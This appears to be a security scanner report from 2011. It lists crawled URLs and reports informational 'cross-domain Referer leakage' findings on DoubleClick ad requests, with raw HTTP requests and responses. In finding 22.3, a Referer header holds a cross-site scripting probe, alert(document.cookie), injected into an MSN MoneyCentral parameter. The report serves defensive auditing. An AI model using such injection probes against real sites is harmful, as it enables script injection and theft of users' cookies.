http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story
http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story
http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story
http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story
http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery
http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery
http://www.amazon.com/gp/product/0470650923
http://www.amazon.com/gp/product/0470650923
http://www.amazon.com/gp/product/0672333368
http://www.amazon.com/gp/product/0672333368
http://www.amazon.com/gp/product/0981511821
http://www.amazon.com/gp/product/184968006X
http://www.amazon.com/gp/product/184968006X
http://www.amazon.com/gp/product/1935182374
http://www.amazon.com/gp/product/1935182374
http://www.bing.com/
http://www.bing.com/fd/fb/mulmfg
http://www.bing.com/images/results.aspx
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/news/search
http://www.bing.com/shopping
http://www.bing.com/shopping/bird-feeders/search
http://www.bing.com/shopping/content/search
http://www.bing.com/shopping/healthy-cooking/r/151
http://www.bing.com/shopping/makeup/c/4259
http://www.bing.com/shopping/swimwear/c/4503
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do
http://www.bing.com/travel/deals/last-minute-flight-deals.do
http://www.bing.com/travel/hotels
http://www.bing.com/videos/browse
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo
http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs
http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o
http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o
http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt
http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy
http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2
http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2
http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo
http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/sharer.php
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.gatorade.com/default.aspx
https://www.google.com/adsense/support/bin/request.py
http://www.macromedia.com/shockwave/download/index.cgi
http://www.microsoft.com/web/gallery/install.aspx
http://www.redacted/
http://www.redacted/
http://www.redacted/
http://www.redacted/
http://www.redacted/
http://www.redacted/scp/AuthServiceFacebook.aspx
http://www.redacted/scp/AuthServiceFacebookLogOff.aspx
http://www.redacted/scp/AuthServiceTwitter.aspx
http://www.redacted/scp/AuthServiceTwitter.aspx
http://www.msnbc.redacted/id/21134540/vp/41314849
http://www.msnbc.redacted/id/21134540/vp/41317511
http://www.msnbc.redacted/id/21134540/vp/41326711
http://www.msnbc.redacted/id/21134540/vp=41325705&
http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science
http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/
http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets
http://www.msnbc.redacted/id/41327694/ns/us_news/
http://www.msnbc.redacted/id/8004316/
http://www.neudesicmediagroup.com/Advertising.aspx
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.scout.com/a.z
http://www.scout.com/search.aspx
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/adchain.html
http://www.silverlight.net/getstarted/devices/details.aspx
http://www.slate.com/id/2282444/
http://www.slate.com/id/2282444/
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/
http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

22.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499?

The response contains the following links to other domains:

http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"><img src="http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499?

The response contains the following links to other domains:

http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_CONTINUUM.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5245
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:38 GMT
Expires: Sun, 30 Jan 2011 17:24:38 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/s%3B234336715%3B2-0%3B0%3B57860936%3B4307-300/250%3B40005128/40022915/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"><img src="http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_CONTINUUM.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3003537/ET_tradefree_60_120x60_wlegal.gif

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 556
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/0/%2a/s;
...[SNIP]...
0/60;39925600/39943387/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_tradefree_60_120x60_wlegal.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3003537/TR_LogoTextPO_No_120x60_ETS.gif

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 13:00:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 554

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/0/%2a/r;
...[SNIP]...
0/60;39772116/39789903/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LGETSBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/TR_LogoTextPO_No_120x60_ETS.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.5. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353?

The response contains the following links to other domains:

http://s0.2mdn.net/3003537/%20TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"><img src="http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.6. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353?

The response contains the following links to other domains:

http://s0.2mdn.net/3003537/1-%20TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5679
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&"><img src="http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=39992639&randnum=4563724
http://s0.2mdn.net/2426847/Branding_Disaster_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5875
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:44 GMT
Expires: Sun, 30 Jan 2011 17:24:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/Branding_Disaster_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=39992639&randnum=4563724" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715
http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com

Request

